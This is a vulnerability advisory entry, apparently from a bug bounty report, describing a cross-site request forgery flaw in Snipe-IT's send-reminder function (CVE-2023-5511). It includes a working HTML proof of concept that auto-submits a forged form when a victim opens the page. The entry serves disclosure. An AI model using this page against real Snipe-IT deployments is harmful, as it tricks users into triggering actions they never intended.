Lucene search
Hainguyen020743206801-9862-48DA-B379-E55E341D78BFHistoryOct 07, 2023 - 5:02 p.m.
CSRF in Send Reminder
2023-10-0717:02:32
hainguyen0207
www.huntr.dev
5
csrf
send reminder
proof of concept
attacker
victim
video poc
bug bounty
0.001 Low
EPSS
Percentile
24.3%
Description
CSRF in Send Reminder
Proof of Concept
1 .Attacker sent form fake to victim
<html>
<body>
<form action="https://demo.snipeitapp.com/reports/unaccepted_assets/4/sent_reminder">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2 .Victim click, execute send reminder unexpected
Video Poc
https://drive.google.com/file/d/1ei_bfxIbACA6DWObg2bjZjJBiqTPlwWd/view?usp=sharing
Related
prion
prion
Cross site request forgery (csrf)
2023-10-11 01:15:00
cvelist
cvelist
CVE-2023-5511 Cross-Site Request Forgery (CSRF) in snipe/snipe-it
2023-10-11 00:00:19
nvd
nvd
CVE-2023-5511
2023-10-11 01:15:08
veracode
veracode
Cross-Site Request Forgery (CSRF)
2023-10-13 04:10:49
osv
osv
Cross-Site Request Forgery (CSRF) in snipe/snipe-it
2023-10-11 03:30:32
CVE-2023-5511
2023-10-11 01:15:08
github
github
Cross-Site Request Forgery (CSRF) in snipe/snipe-it
2023-10-11 03:30:32
cve
cve
CVE-2023-5511
2023-10-11 01:15:08